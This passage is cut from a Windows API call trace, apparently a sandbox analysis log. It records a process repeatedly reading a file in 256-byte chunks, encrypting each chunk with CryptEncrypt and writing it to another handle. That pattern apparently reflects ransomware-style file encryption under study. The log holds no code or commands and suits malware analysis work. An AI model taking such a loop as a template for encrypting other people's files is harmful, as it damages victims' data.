nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.572] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.572] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.572] GetLastError () returned 0x0 [0143.572] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.572] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.572] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.572] GetLastError () returned 0x0 [0143.572] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.572] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.572] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.572] GetLastError () returned 0x0 [0143.572] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.572] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.572] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.572] GetLastError () returned 0x0 [0143.572] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.572] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.573] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.573] GetLastError () returned 0x0 [0143.573] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.573] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.573] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.573] GetLastError () returned 0x0 [0143.573] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.573] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.573] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.573] GetLastError () returned 0x0 [0143.573] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.573] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.573] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.573] GetLastError () returned 0x0 [0143.573] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.573] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.573] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.573] GetLastError () returned 0x0 [0143.573] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.573] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.573] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.573] GetLastError () returned 0x0 [0143.573] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.573] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.573] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.574] GetLastError () returned 0x0 [0143.574] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.574] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.596] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.596] GetLastError () returned 0x0 [0143.596] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.596] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.596] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.596] GetLastError () returned 0x0 [0143.596] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.596] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.596] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.596] GetLastError () returned 0x0 [0143.596] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.596] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.596] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.596] GetLastError () returned 0x0 [0143.596] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.597] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.597] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.597] GetLastError () returned 0x0 [0143.597] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.597] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.597] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.597] GetLastError () returned 0x0 [0143.597] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.597] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.597] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.597] GetLastError () returned 0x0 [0143.597] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.597] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.597] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.597] GetLastError () returned 0x0 [0143.597] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.597] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.597] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.597] GetLastError () returned 0x0 [0143.597] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.597] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.597] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.597] GetLastError () returned 0x0 [0143.597] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.597] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.598] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.598] GetLastError () returned 0x0 [0143.598] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.598] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.598] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.598] GetLastError () returned 0x0 [0143.598] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.598] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.598] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.598] GetLastError () returned 0x0 [0143.598] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.598] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.598] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.598] GetLastError () returned 0x0 [0143.598] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.598] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.598] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.598] GetLastError () returned 0x0 [0143.598] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.599] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.599] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.599] GetLastError () returned 0x0 [0143.599] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.599] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.599] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.599] GetLastError () returned 0x0 [0143.599] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.599] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.599] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.599] GetLastError () returned 0x0 [0143.599] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.599] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.599] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.599] GetLastError () returned 0x0 [0143.599] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.599] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.599] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.599] GetLastError () returned 0x0 [0143.599] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.599] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.600] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.600] GetLastError () returned 0x0 [0143.600] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.600] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, 